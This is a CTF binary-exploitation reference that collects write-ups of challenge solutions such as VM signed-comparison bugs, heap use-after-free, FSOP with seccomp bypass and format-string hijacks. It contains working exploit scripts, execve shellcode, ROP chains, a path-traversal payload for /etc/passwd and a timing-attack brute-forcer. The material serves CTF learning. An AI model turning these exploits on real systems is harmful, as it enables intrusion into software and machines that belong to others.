# CTF Pwn - Advanced Exploit Techniques

## Table of Contents
- [VM Signed Comparison Bug (0xFun 2026)](#vm-signed-comparison-bug-0xfun-2026)
- [BF JIT Unbalanced Bracket to RWX Shellcode (VuwCTF 2025)](#bf-jit-unbalanced-bracket-to-rwx-shellcode-vuwctf-2025)
- [Type Confusion in Interpreter (VuwCTF 2025)](#type-confusion-in-interpreter-vuwctf-2025)
- [Off-by-One Index to Size Corruption (VuwCTF 2025)](#off-by-one-index-to-size-corruption-vuwctf-2025)
- [Double win() Call Pattern (VuwCTF 2025)](#double-win-call-pattern-vuwctf-2025)
- [DNS Record Buffer Overflow](#dns-record-buffer-overflow)
- [ASAN Shadow Memory Exploitation](#asan-shadow-memory-exploitation)
- [Format String with Encoding Constraints + RWX .fini_array Hijack](#format-string-with-encoding-constraints--rwx-fini_array-hijack)
- [Custom Canary Preservation](#custom-canary-preservation)
- [Integer Truncation via Order of Operations (CSAW 2015)](#integer-truncation-via-order-of-operations-csaw-2015)
- [Signed Integer Bypass (Negative Quantity)](#signed-integer-bypass-negative-quantity)
- [Canary-Aware Partial Overflow](#canary-aware-partial-overflow)
- [Global Buffer Overflow (CSV Injection)](#global-buffer-overflow-csv-injection)
- [MD5 Preimage Gadget Construction](#md5-preimage-gadget-construction)
- [VM GC-Triggered UAF — Slab Reuse (EHAX 2026)](#vm-gc-triggered-uaf--slab-reuse-ehax-2026)
- [Path Traversal Sanitizer Bypass](#path-traversal-sanitizer-bypass)
- [Timing Attack for Character-by-Character Flag Recovery (RC3 CTF 2016)](#timing-attack-for-character-by-character-flag-recovery-rc3-ctf-2016)
- [FSOP + Seccomp Bypass via openat/mmap/write (EHAX 2026)](#fsop--seccomp-bypass-via-openatmmapwrite-ehax-2026)
- [Motorola 68000 (m68k) Two-Stage Shellcode (HackIT 2017)](#motorola-68000-m68k-two-stage-shellcode-hackit-2017)
- [DOS COM Real Mode Shellcode (SEC-T CTF 2017)](#dos-com-real-mode-shellcode-sec-t-ctf-2017)
- [Seccomp BPF X-Register Addressing Mode Bypass (HITCON 2017)](#seccomp-bpf-x-register-addressing-mode-bypass-hitcon-2017)
- [Custom Printf Format Specifier Arginfo Overwrite (Hack.lu 2017)](#custom-printf-format-specifier-arginfo-overwrite-hacklu-2017)

---

## VM Signed Comparison Bug (0xFun 2026)

**Pattern (CHAOS ENGINE):** Custom VM STORE opcode checks `offset <= 0xfff` with signed `jle` but no lower bound check.

**Exploit:**
1. Negative offsets reach function pointer table below data area
2. Build values byte-by-byte in VM memory using VM arithmetic
3. LOAD as qwords, compute negative offsets via XOR with 0xFF..FF
4. Overwrite HALT handler with `system@plt`
5. Trigger HALT with "sh" string pointer as argument

**General lesson:** Signed vs unsigned comparison bugs in custom VMs are common. Always check bounds in both directions. Function pointer tables near data buffers = easy RCE.

---

## BF JIT Unbalanced Bracket to RWX Shellcode (VuwCTF 2025)

**Pattern (Blazingly Fast Memory Unsafe):** BF JIT compiler uses stack for `[`/`]` control flow. Unbalanced `]` pops values from prologue.

**Vulnerability:** `]` (LOOP_END) pops return address from stack. Without matching `[`, it pops the **tape address** which resides in **RWX memory**.

**Exploit:**
```python
# Stage 1: Write shellcode to tape via BF +/- operations, then trigger ]
# Use - for bytes >127 (0xff = 1 decrement vs 255 increments)
stage1 = b''
# Build read(0, tape, 256) shellcode on tape
shellcode_bytes = asm(shellcraft.read(0, 'r14', 256))
for byte in shellcode_bytes:
    if byte <= 127:
        stage1 += b'+' * byte + b'>'
    else:
        stage1 += b'-' * (256 - byte) + b'>'
stage1 += b']'  # Unbalanced ] jumps to tape (RWX)

# Stage 2: Send full execve("/bin/sh") shellcode via stdin after Stage 1 runs
```

**Identification:** JIT compilers using stack for bracket matching + RWX tape memory.

---

## Type Confusion in Interpreter (VuwCTF 2025)

**Pattern (Idempotence):** Lambda calculus interpreter's `simplify_normal_order()` unconditionally sets function type to ABS (abstraction), even when it's a VAR (variable).

**Key insight:** VAR's unused bytes 16-23 get interpreted as body pointer. When `print_expression()` encounters type > 2, it dumps raw bytes as UNKNOWN_DATA — flag bytes interpreted as type value trigger the dump.

**General lesson:** Type confusion in interpreters occurs when type tags aren't validated before downcasting. Unused padding bytes in one variant become active fields in another.

---

## Off-by-One Index to Size Corruption (VuwCTF 2025)

**Pattern (Kiwiphone):** Index 0 writes to `entries[-1]`, overlapping a struct's `size` field.

**Exploit chain:**
1. Write to index 0 with crafted data to set `phonebook.size = 48` (normally 16)
2. `print_all` now dumps 48 entries, leaking stack canary, saved RBP, and libc return address
3. Calculate libc base from leaked return address
4. Write ROP chain into entries 17-22: `[canary] [rbp] [ret] [pop_rdi] [/bin/sh] [system]`
5. Exit with -1 to trigger return through ROP chain

**Format trick:** Phone format `+48 0 0-0` doubles as valid phone number AND size overwrite value.

---

## Double win() Call Pattern (VuwCTF 2025)

**Pattern (Tokaid):** `win()` has `if (attempts++ > 0)` check — first call increments from 0 (fails), second call succeeds.

**Payload:** Stack two return addresses: `b'A'*offset + p64(win) + p64(win)`

**PIE calculation:** When main address is leaked: `base = main_leak - main_offset; win = base + win_offset`.

---

## DNS Record Buffer Overflow

**Pattern (Do Not Strike The Clouds):** Many AAAA records overflow stack buffer in DNS response parser.

**Exploitation:**
1. Set up DNS server returning excessive AAAA records
2. Target binary queries DNS, copies records into fixed-size stack buffer
3. Many records overflow into return address
4. Overwrite with win function address

## ASAN Shadow Memory Exploitation

**Pattern (Asan-Bazar, Nullcon 2026):** Binary compiled with AddressSanitizer has format string + OOB write vulnerabilities.

**ASAN Shadow Byte Layout:**
| Shadow Value | Meaning |
|-------------|---------|
| `0x00` | Fully accessible (8 bytes) |
| `0x01-0x07` | Partially accessible (1-7 bytes) |
| `0xF1` | Stack left redzone |
| `0xF3` | Stack right redzone |
| `0xF5` | Stack use after return |

**Key Insight:** ASAN may use a "fake stack" (50% chance) — areas past the ASAN frame have shadow `0x00` on the real stack but different on the fake stack. Detect which by leaking the return address offset.

**Exploitation Pattern:**
```python
# 1. Leak PIE base via format string
payload = b'%8$p'  # Code pointer at known offset
pie_base = leaked - known_offset

# 2. Detect real vs fake stack
# Real stack: return address at known offset from format string buffer
# Check if leaked return address matches expected function offset
is_real_stack = (ret_addr - pie_base) == 0xdc052  # known offset

# 3. Calculate OOB write offset
# Format string buffer at stack offset N
# Target (return address) at stack offset M
# Distance in bytes = (M - N) * 8
# Map to ledger system: slot = distance // 16, sub_offset = distance % 16

# 4. Overwrite return address with win() via OOB ledger write
# Retry until real stack is used (~50% success rate per attempt)
```

**Single-Interaction Exploitation:** Combine leak + detect + exploit in one format string interaction. If fake stack detected, disconnect and retry.

## Format String with Encoding Constraints + RWX .fini_array Hijack

**Pattern (Encodinator, Nullcon 2026):** Input is base85-encoded into RWX memory at fixed address, then passed to `printf()`.

**Key insight:** Don't try libc-based exploitation. Instead, exploit the RWX mmap region directly:

1. **RWX region at fixed address** (e.g., `0x40000000`): Write shellcode here
2. **`.fini_array` hijack**: Overwrite `.fini_array[0]` to point to shellcode. When `main()` returns, `__libc_csu_fini` calls `fini_array` entries.
3. **Format string writes**: Use `%hn` to write 2 bytes at a time to `.fini_array`

**Argument numbering with base85:**
Base85 decoding changes payload length. The decoded prefix occupies P bytes on stack, so first appended pointer is at arg `6 + P/8`. Use convergence loop:

```python
arg_base = 20  # Initial guess
for _ in range(20):
    fmt = construct_format_string(writes, arg_base)
    # Pad to base85 group boundary (multiple of 5 encoded = 4 raw)
    while len(fmt) % 10 != 0:
        fmt += b"A"
    prefix = b85_decode(fmt)
    new_arg_base = 6 + (len(prefix) // 8)
    if new_arg_base == arg_base:
        break
    arg_base = new_arg_base
```

**Shellcode (19-byte execve):**
```nasm
push 0x3b          ; syscall number
pop rax
cdq                ; rdx = 0
movabs rbx, 0x68732f2f6e69622f  ; "/bin//sh"
push rdx           ; null terminator
push rbx           ; "/bin//sh"
push rsp
pop rdi            ; rdi = pointer to "/bin//sh"
push rdx
pop rsi            ; rsi = NULL
syscall
```

**Why avoid libc:** Base85 encoding makes precise libc address calculations extremely difficult. The RWX region + .fini_array approach uses only fixed addresses (no ASLR, no PIE concerns for the write target).

## Custom Canary Preservation

**Pattern (Canary In The Bitcoin Mine):** Buffer overflow must preserve known canary value.

**Key technique:** Write the exact canary bytes at the correct offset during overflow:
```python
# Buffer: 64 bytes | Canary: "BIRD" (4 bytes) | Target: 1 byte
payload = b'A' * 64 + b'BIRD' + b'X'  # Preserve canary, set target to non-zero
```

**Identification:** Source code shows struct with buffer + canary + flag bool, `gets()` for input.

---

## Integer Truncation via Order of Operations (CSAW 2015)

Incorrect integer arithmetic ordering causes truncation bugs:

```c
// Vulnerable: integer division truncates before multiply
int position = 4 * (ticks / 1000);  // 1500 ticks -> 4 * 1 = 4

// Correct: multiply first to preserve precision
int position = (4 * ticks) / 1000;  // 1500 ticks -> 6000 / 1000 = 6
```

This creates an off-by-N error (position overshoots buffer end by 2 bytes), enabling:
1. Heap metadata corruption via out-of-bounds write
2. Adjacent object pointer overwrite for read/write primitives
3. Chain with heap spray for ASLR bypass via information leak

**Key insight:** Audit integer expressions where division precedes multiplication -- the truncation gap grows with input magnitude.

---

## Signed Integer Bypass (Negative Quantity)

**Pattern (PascalCTF 2026):** Menu program with `scanf("%d")` for quantity. Negative input makes `quantity * price` negative, bypassing `balance >= total_cost` check.

```python
# Select expensive item (e.g., flag drink costing 1B), enter quantity -1
# -1 * 1000000000 = -1000000000 → balance (100) >= -1000000000 ✓
p.sendline(b'10')  # flag item
p.sendline(b'-1')  # negative quantity
```

## Canary-Aware Partial Overflow

**Pattern (MyGit, PascalCTF 2026):** Buffer overflow where `valid` flag sits between buffer end and canary.

**Stack layout:**
- Buffer: `rbp-0x30` (48 bytes)
- Valid flag: `rbp-0x10` (offset 32 from buffer)
- Stack canary: `rbp-0x08` (offset 40 from buffer)

**Key technique:** Use `./` as no-op path padding to control input length precisely:
```text
././././././././././../../../../flag    (36 bytes)
```
- `./` segments normalize to current directory (no-op)
- Byte 32 must be non-zero to set `valid = true`
- Stay under byte 40 to avoid canary

**Exploit chain:**
1. `checkout ././././././././././../../../../flag` - reads `/flag` content as "current commit"
2. `branch create ././././././././././../../../../tmp/leaked` - writes commit (flag) to `/tmp/leaked`
3. `cat /tmp/leaked` - read the exfiltrated flag

## Global Buffer Overflow (CSV Injection)

**Pattern (Spreadsheet):** Adjacent global variables exploitable via overflow.

**Exploitation:**
1. Identify global array adjacent to filename pointer in memory
2. Overflow array bounds by injecting extra delimiters (commas in CSV)
3. Overflowed pointer lands on filename variable
4. Change filename to `flag.txt`, then trigger read operation

```python
# Edit last cell with comma-separated overflow
edit_cell("J10", "whatever,flag.txt")
save()   # CSV row now has 11 columns
load()   # Column 11 overwrites savefile pointer with ptr to "flag.txt"
load()   # Now reads flag.txt into spreadsheet
print_spreadsheet()  # Shows flag
```

## MD5 Preimage Gadget Construction

**Pattern (Hashchain, Nullcon 2026):** Server concatenates N MD5 digests and executes them as code. Brute-force preimages with desired byte prefixes.

**Core technique:** Each MD5 digest is 16 bytes. Use `eb 0c` (jmp +12) as first 2 bytes to skip the middle 12 bytes, landing on bytes 14-15 which become a 2-byte instruction:

```c
// Brute-force MD5 preimage with prefix eb0c and desired 2-byte suffix
for (uint64_t ctr = 0; ; ctr++) {
    sprintf(msg + prefix_len, "%016llx", ctr);
    MD5(msg, msg_len, digest);
    if (digest[0] == 0xEB && digest[1] == 0x0C) {
        uint16_t suffix = (digest[14] << 8) | digest[15];
        if (suffix == target_instruction)
            break;  // Found!
    }
}
```

**Building i386 syscall chains from 2-byte gadgets:**
- `31c0` = `xor eax, eax`
- `89e1` = `mov ecx, esp`
- `b220` = `mov dl, 0x20`
- `cd80` = `int 0x80`
- `40` + NOP = `inc eax`

**Hashchain v1 (JMP to NOP sled):** RWX buffer at `0x40000000` + NOP sled at `0x41000000`. Find MD5 preimage starting with `0xE9` (jmp rel32) that lands in the sled:
```python
# Brute-force: find input whose MD5 starts with E9 and offset lands in NOP sled
# Example: b"v" + b"G" * 86 → MD5 starts with e9 59 1f 2c → jmp 0x412c1f5e
```

**Hashchain v2 (3-hash chain):** Store MD5 digests at user-controlled offsets. Build instruction chain:
- **Offset 0 (jmp +2):** Find input whose MD5 starts with `EB 02` (e.g., `143874`)
- **Offset 4 (push win):** Find input whose MD5 starts with `68 XX XX XX` matching win() address bytes
- **Offset 8 (ret):** Find input whose MD5 byte[1] is `C3` (e.g., `5488` → `56 C3`)

**Pre-computation approach:** Build lookup table mapping MD5 4-byte prefixes to inputs. At runtime, parse win() address from server banner, look up matching push-hash input.

**Brute-force time:** 32-bit prefix match: ~2^32 hashes (~60s on 8 cores). 16-bit: instant.

## VM GC-Triggered UAF — Slab Reuse (EHAX 2026)

**Pattern (SarcAsm):** Custom stack-based VM with NEWBUF/SLICE/GC/BUILTIN opcodes. Slicing a buffer creates a shared reference to the same slab. When the slice is dropped and GC'd, it frees the shared slab even though the parent buffer is still alive.

**Vulnerability:** `free_data()` called on slice frees the underlying slab pointer that the parent buffer still references → UAF read/write through parent.

**Exploit chain:**
1. `NEWBUF 24` → allocates 32-byte slab (slab class matches function objects)
2. `READ 24` → fills buffer, sets length so SLICE bounds check passes
3. `SLICE 0,24` → alias to same slab
4. `DROP` + `GC` → frees the slab via slice's destructor
5. `BUILTIN 0` → allocates function object, reuses freed 32-byte slab (code pointer at offset +8)
6. `WRITEBUF 16,0` → sets parent buffer's length to 16 (no actual write, bypasses bounds)
7. `PRINTB` → leaks code pointer from UAF slab → compute PIE base
8. `READ 16` → overwrites code pointer with `win()` address
9. `CALL` → executes `win()` → `execve("/bin/sh")`

```python
from pwn import *
import struct

# ULEB128 encoding for VM immediates
def uleb128(val):
    result = b''
    while True:
        byte = val & 0x7f
        val >>= 7
        if val: byte |= 0x80
        result += bytes([byte])
        if not val: break
    return result

# Opcodes
NEWBUF, READ, SLICE, DROP, GC = b'\x20', b'\x21', b'\x22', b'\x04', b'\x60'
BUILTIN, CALL, GLOAD, GSTORE = b'\x40', b'\x41', b'\x30', b'\x31'
WRITEBUF, PRINTB, PUSH, HALT = b'\x25', b'\x23', b'\x01', b'\xff'

code = b''
code += NEWBUF + uleb128(24) + GSTORE + uleb128(0)  # buf A in slot 0
code += GLOAD + uleb128(0) + READ + uleb128(24)      # fill to set length
code += GLOAD + uleb128(0) + SLICE + uleb128(0) + uleb128(24)  # slice
code += DROP + GC                                      # free slab via slice
code += BUILTIN + uleb128(0) + GSTORE + uleb128(1)   # func F reuses slab
code += GLOAD + uleb128(0) + WRITEBUF + uleb128(16) + uleb128(0)  # set len=16
code += GLOAD + uleb128(0) + PRINTB                    # leak code ptr
code += GLOAD + uleb128(0) + READ + uleb128(16)       # overwrite code ptr
code += PUSH + b'\x00' + GLOAD + uleb128(1) + CALL + uleb128(1)  # call win
code += HALT

blob = struct.pack('<I', len(code)) + code
p = remote('target', 9999)
p.send(blob + b'A'*24)          # blob + dummy READ data
leak = p.recv(16, timeout=5)
code_ptr = struct.unpack('<Q', leak[:8])[0]
win_addr = (code_ptr - 0x31d0) + 0x3000  # PIE base + win offset
p.send(struct.pack('<Q', win_addr) + b'\x00'*8)
p.sendline(b'cat /flag*')
p.interactive()
```

**Key lessons:**
- **Slab allocator reuse:** Function objects and buffer data share the same slab size class → guaranteed UAF overlap
- **WRITEBUF length trick:** Setting length without writing data bypasses bounds checks but exposes UAF content
- **GC as trigger:** Explicit `GC` opcode forces immediate collection → deterministic UAF timing
- **General pattern:** In custom VMs, look for shared references (slices, views, aliases) where destruction of one frees resources still held by another

---

## Path Traversal Sanitizer Bypass

**Pattern (Galactic Archives):** Sanitizer skips character after finding banned char.

```python
# Sanitizer removes '.' and '/' but skips next char after match
# ../../etc/passwd -> bypass with doubled chars:
"....//....//etc//passwd"
# Each '..' becomes '....' (first '.' caught, second skipped, third caught, fourth survives)
```

**Flag via `/proc/self/fd/N`:**
- If binary opens flag file but doesn't close fd, read via `/proc/self/fd/3`
- fd 0=stdin, 1=stdout, 2=stderr, 3=first opened file

## Timing Attack for Character-by-Character Flag Recovery (RC3 CTF 2016)

When a server validates input character-by-character with measurable per-character delay, use timing side-channels to brute-force the flag one byte at a time.

```python
import socket
import time
import string

def measure_time(host, port, guess):
    """Send guess and measure server response time"""
    s = socket.socket()
    s.connect((host, port))
    s.recv(1024)  # banner

    start = time.time()
    s.send(guess.encode() + b'\n')
    s.recv(1024)
    elapsed = time.time() - start

    s.close()
    return elapsed

flag = "RC3-2016-"
charset = string.ascii_letters + string.digits + "_-{}"
THRESHOLD = 0.15  # seconds per correct character (calibrate per target)
SAMPLES = 3       # average multiple measurements to reduce noise

while not flag.endswith('}'):
    best_char = ''
    best_time = 0

    for c in charset:
        guess = flag + c
        # Average multiple samples to reduce network jitter
        avg_time = sum(measure_time(host, port, guess) for _ in range(SAMPLES)) / SAMPLES

        if avg_time > best_time:
            best_time = avg_time
            best_char = c

    if best_time > len(flag) * THRESHOLD:
        flag += best_char
        print(f"Flag so far: {flag} (time: {best_time:.3f}s)")
    else:
        print("Timing unclear, retrying...")

print(f"Flag: {flag}")
```

**Key insight:** Each correct character adds a measurable delay (typically 100-250ms). Average multiple samples to overcome network jitter. The total response time scales linearly with the number of correct prefix characters, making the correct character at each position distinguishable.

---

## FSOP + Seccomp Bypass via openat/mmap/write (EHAX 2026)

**Pattern (The Revenge of Womp Womp):** Heap exploit (UAF) leading to FSOP chain, but seccomp blocks standard `open`/`read`/`write` or `execve`. Use alternative syscalls to read the flag.

**Exploit chain:**
1. **Leak libc** via `show()` on freed unsorted bin chunk (fd/bk pointers)
2. **UAF → unsafe unlink** to redirect pointer to `.bss` region
3. **Craft fake FILE** structure on heap with vtable pointing to `_IO_wfile_jumps`
4. **FSOP chain:** `_IO_wfile_overflow` → `_IO_wdoallocbuf` → `_IO_WDOALLOCATE(fp)`
5. **Stack pivot** via `mov rsp, rdx` gadget (rdx controllable from FILE struct)
6. **ROP chain** using seccomp-compatible syscalls

**Seccomp bypass with openat/mmap/write:**
```python
# When seccomp blocks open() and read(), use:
# openat(AT_FDCWD, "/flag", O_RDONLY)  - syscall 257
# mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd, 0)  - syscall 9
# write(STDOUT, mapped_addr, 4096)  - syscall 1

from pwn import *

rop = ROP(libc)
# openat(AT_FDCWD=-100, "/flag", O_RDONLY=0)
rop.raw(pop_rdi)
rop.raw(-100 & 0xffffffffffffffff)  # AT_FDCWD
rop.raw(pop_rsi)
rop.raw(flag_str_addr)               # pointer to "/flag\x00"
rop.raw(pop_rdx_rbx)
rop.raw(0)                            # O_RDONLY
rop.raw(0)
rop.raw(libc.sym.openat)

# mmap(NULL, 4096, PROT_READ=1, MAP_PRIVATE=2, fd=3, 0)
rop.raw(pop_rdi)
rop.raw(0)                            # addr = NULL
rop.raw(pop_rsi)
rop.raw(0x1000)                       # length
rop.raw(pop_rdx_rbx)
rop.raw(1)                            # PROT_READ
rop.raw(0)
# r10 = MAP_PRIVATE (2), r8 = fd (3) - need gadgets for these
rop.raw(libc.sym.mmap)

# write(1, mapped_addr, 4096)
rop.raw(pop_rdi)
rop.raw(1)                            # stdout
rop.raw(pop_rsi)
rop.raw(mapped_addr)                  # mmap return value
rop.raw(pop_rdx_rbx)
rop.raw(0x1000)
rop.raw(0)
rop.raw(libc.sym.write)
```

**`mov rsp, rdx` stack pivot gadget:**
```python
# Common in libc — search with:
# ROPgadget --binary libc.so.6 | grep "mov rsp, rdx"
# or: one_gadget libc.so.6 (sometimes lists pivot gadgets)

# In FSOP context: rdx is controllable via _IO_wide_data fields
# Set _wide_data->_IO_buf_base to point to your ROP chain
# When _IO_WDOALLOCATE is called, rdx = _wide_data->_IO_buf_base
# Pivot: mov rsp, rdx → ROP chain runs
```

**Key insight:** "Stale size tracking" = the menu tracks object sizes but doesn't invalidate after free. This enables UAF because `show()`/`edit()` still use the old size to access freed memory. Always check if delete nullifies the size field in addition to the pointer.

**Seccomp alternative syscall quick reference:**
| Blocked | Alternative | Syscall # |
|---------|------------|-----------|
| `open` | `openat` | 257 |
| `open` | `openat2` | 437 |
| `read` | `mmap` + access | 9 |
| `read` | `pread64` | 17 |
| `read` | `readv` | 19 |
| `write` | `writev` | 20 |
| `write` | `sendfile` | 40 |

---

## Motorola 68000 (m68k) Two-Stage Shellcode (HackIT 2017)

**Pattern:** m68k Linux binary accepts only 14 bytes of shellcode. Two-stage approach: the first stage jumps back to the binary's own `read()` call with a larger buffer size and the existing mmap'd RWX pointer. The full second-stage shellcode performs socket reuse via `dup2` and `execve('/bin/sh')`. m68k syscall convention: number in `d0`, arguments in `d1`–`d3`, `trap #0`.

m68k Linux syscall numbers: `read=3`, `write=4`, `dup2=63`, `execve=11`.

```asm
; Stage 1 (14 bytes): patch d3=256 and jump to binary's read() call site
; Reuses binary's existing socket fd (d1) and mmap'd RWX region (d2)
move.l  #256, %d3        ; count = 256  (4 bytes: 0x263C 0x0000 0x0100)
jmp     read_call_site   ; jump to binary's trap #0  (6 bytes: 0x4EF9 + 4-byte addr)
```

```asm
; Stage 2 (full shellcode read into RWX region by stage 1):
; dup2(sock_fd, 0/1/2) — sock_fd is already in d1 from stage 1
moveq   #63, %d0         ; dup2
moveq   #0,  %d2         ; newfd = stdin
trap    #0
moveq   #63, %d0
moveq   #1,  %d2         ; newfd = stdout
trap    #0
moveq   #63, %d0
moveq   #2,  %d2         ; newfd = stderr
trap    #0

; execve("/bin/sh", ["/bin/sh", NULL], NULL)
lea     binsh(%pc), %a0  ; "/bin/sh\0"
move.l  %a0, %d1
sub.l   %d2, %d2         ; d2 = NULL (argv approximation for CTF)
sub.l   %d3, %d3         ; d3 = NULL (envp)
moveq   #11, %d0         ; execve
trap    #0
binsh:  .ascii "/bin/sh\0"
```

**Key insight:** When shellcode size is severely constrained, re-use the program's own `read()` function with the already-mmap'd RWX region as the destination buffer. m68k uses `trap #0` with d0–d3 registers, not the x86 `int 0x80`/`syscall` convention.

**References:** HackIT CTF 2017

---

## DOS COM Real Mode Shellcode (SEC-T CTF 2017)

**Pattern:** DOS COM executables run in 16-bit real mode with no memory protection — the code segment is writable at runtime. An arbitrary write primitive into the code segment at an EXIT handler location allows injecting payload code. Payloads use DOS `int 0x21` syscalls: `ah=0x3d` (open file), `ah=0x3f` (read file), `ah=0x09` (print string).

```asm
; DOS COM exploitation: code segment is writable
; INT 0x21 syscall convention: ah = function number
; Useful functions:
;   ah=0x3d  open file: ds:dx = filename, al = mode → ax = fd
;   ah=0x3f  read file: bx = fd, cx = count, ds:dx = buffer → ax = bytes read
;   ah=0x09  print $-terminated string: ds:dx = string address
;   ah=0x4c  exit: al = exit code

; Example: read flag.txt and print it
mov dx, offset flag_name   ; "flag.txt$"
mov ax, 0x3d00             ; open, read-only
int 0x21                   ; ax = file handle

mov bx, ax                 ; fd = file handle
mov dx, offset buffer
mov cx, 0x100              ; read 256 bytes
mov ah, 0x3f
int 0x21                   ; read into buffer

; Terminate buffer with '$' for int 0x21 ah=0x09
mov dx, offset buffer
mov ah, 0x09
int 0x21                   ; print buffer
```

**Key insight:** DOS COM files have no read-only memory — the code segment is writable. DOS interrupts `int 0x21` with `ah=3d/3f/09` handle open/read/print. Any write primitive that reaches the code segment can inject executable shellcode, even at EXIT handler positions.

**References:** SEC-T CTF 2017

---

## Seccomp BPF X-Register Addressing Mode Bypass (HITCON 2017)

**Pattern:** A seccomp BPF filter uses the X-register addressing mode (opcode `0x1d`) to compare `syscall_number == rdx` (the third argument). However, `libseccomp-tools` (and older `seccomp-tools`) disassemblers do not support the X-register addressing mode, causing the filter to appear more restrictive than it actually is. Reality: if `rax` (syscall number) equals `rdx` (3rd argument) at the time of the syscall, the comparison passes and the syscall is allowed.

**How to detect:**
```bash
# Dump BPF bytecode manually and look for opcode 0x1d (JEQ X)
# seccomp-tools disassembly will show "???" or skip lines for 0x1d opcodes
# Raw bytecode: struct sock_filter { __u16 code; __u8 jt; __u8 jf; __u32 k; }
# code=0x1d: BPF_JMP | BPF_JEQ | BPF_X  → compare A == X (X-register)
python3 -c "
import struct
data = open('seccomp_filter.bin','rb').read()
for i in range(0, len(data), 8):
    code, jt, jf, k = struct.unpack('<HBBI', data[i:i+8])
    if code == 0x1d:
        print(f'[{i//8}] JEQ X  jt={jt} jf={jf}  (X-reg compare!)')
"
```

**Exploitation:**
```python
# Filter effectively allows: syscall if rax == rdx
# Arrange rdx to equal the desired syscall number before the syscall instruction
# Example: execve = 59, so set rdx = 59 and rax = 59
# Both conditions match → filter permits the call
rop = flat(
    pop_rdx_rbx, 59, 0,     # rdx = 59 (execve)
    pop_rax, 59,             # rax = 59
    pop_rdi, binsh_addr,
    pop_rsi, 0,
    syscall_ret,
)
```

**Key insight:** Security tools that cannot decode all BPF addressing modes give false confidence — always verify filter behavior by reading raw BPF bytecode or testing empirically. The X-register mode (`JEQ X`, opcode `0x1d`) is valid BPF but rarely generated by `libseccomp`, so tools miss it.

**References:** HITCON CTF 2017

---

## Custom Printf Format Specifier Arginfo Overwrite (Hack.lu 2017)

**Pattern:** glibc's `register_printf_specifier()` stores function pointers (including an `arginfo` callback) in a heap buffer. A heap overflow overwrites the `arginfo` callback for a custom format specifier. The first field of `printf_info` passed to the `arginfo` function is `precision` — an attacker-controlled integer from `%.Ns` (where N is the precision value). Encoding a shell command as its decimal ASCII value (e.g., `26739` = `'s','h','\0'` as little-endian bytes) causes the `arginfo` callback to receive `"sh"` as its string argument, achieving command execution.

**Mechanism:**
```c
// register_printf_specifier stores:
//   handler_fn   (called to produce output)
//   arginfo_fn   (called to determine argument type/size)
// Both are stored as pointers in a heap region

// When printf("%.26739s", ...) is called with custom specifier:
//   printf_info.precision = 26739  (= 0x6873 = 'sh' in little-endian)
//   arginfo_fn is called with &printf_info as first argument
//   If arginfo_fn = system: system((char*)&printf_info) → system("sh\x00...")
//   because the precision field at offset 0 contains the bytes 's','h','\0'
```

**Exploitation:**
```python
# Overflow heap to overwrite arginfo_fn pointer with system()
# Then trigger with precision encoding the command:
# "sh" = ord('s') + ord('h') * 256 = 0x68 * 256 + 0x73 = 26739
payload = b'%.26739s'  # precision=26739, bytes: 0x73 0x68 0x00 = "sh\0"
# When custom specifier is used, arginfo(printf_info_ptr) → system("sh")
```

**Key insight:** Custom printf format handlers expose `precision` and `width` as attacker-controlled integers in `printf_info`. Encoding a shell command as the decimal precision value (e.g., `26739` = `"sh\0"`) causes the `arginfo` callback — if overwritten with `system()` — to execute the command. The `printf_info` struct's first field is the argument to `system()`.

**References:** Hack.lu CTF 2017

---

See [advanced-exploits-2.md](advanced-exploits-2.md) for bytecode validator bypass, io_uring UAF with SQE injection, integer truncation bypass, GC null-reference cascading corruption, leakless libc via multi-fgets, signed/unsigned char underflow with TLS destructor hijack, custom shadow stack bypass, and signed int overflow with XSS-to-binary pwn bridge.

See [advanced-exploits-3.md](advanced-exploits-3.md) for stack variable overlap, 1-byte overflow via 8-bit loop counter, game AI arithmetic mean OOB read, arbitrary read/write GOT overwrite, stack leak via __environ + memcpy overflow, JIT sandbox uint16 jump truncation, DNS compression pointer overflow, and ELF signing bypass via program header manipulation.
